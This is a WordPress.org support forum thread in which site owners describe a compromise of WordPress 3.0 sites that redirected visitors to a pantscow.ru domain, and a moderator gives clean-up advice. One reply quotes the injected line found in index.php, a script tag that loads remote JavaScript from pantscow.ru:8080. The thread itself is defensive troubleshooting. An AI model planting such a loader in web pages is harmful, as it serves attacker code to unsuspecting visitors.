WordPress.org

Ready to get started?Download WordPress

Forums

WordPress 3.0 and XSS (4 posts)

  1. eric-generic
    Member
    Posted 3 years ago #

    On Sunday, 11 July, our website -- erictric.com -- was exploited by means of XSS, which directed to a domain name along the lines of pantscow.ru.

    We were forced to revert to a backup, unfortunately, which ensured I lost a full night of sleep.

    I am frightened by the thought of not knowing of the origin of this attack, and fear it may happen again. Our site has been hack-free sinc inception, and the only thing we've changed recently is an upgrade to WordPress 3.0 when it was released.

    Does anyone have any idea as to whether or not their may be security holes in 3.0? Is there a way I can find out how the attack came about? How to prevent it?

    I can say that our passwords are all very secure (mixed numbers, letters, special characters), and our folder perms are set to 755, file perms to 644.

    Any suggestions would be greatly, greatly appreciated.

  2. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

    There are no known security holes in WP 3.0 at present. However, it is possible that a plugin (or, in theory, even a theme) could have introduced a security issue. I'd suggest re-checking all plugins and getting rid of any that you're not 100% sure about. Also, review Hardening_WordPress and read:

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

  3. eric-generic
    Member
    Posted 3 years ago #

    Thanks for the advice. It just doesn't make sense. Everything, for the most part, has remained the same.

  4. ivie
    Member
    Posted 3 years ago #

    Just got the same problem with my site. After checking everything. I found this script in wordpress index.php file not in template index file.

    <sc ript type="text/javascript" src="http://pantscow.ru:8080/Gigaflops.js"></sc ript>
    <!--cc1a48d2b07574da5394e16fab30de34-->

    try to check .. index, header or any file you think the script could be added.

Topic Closed

This topic has been closed to new replies.

About this Topic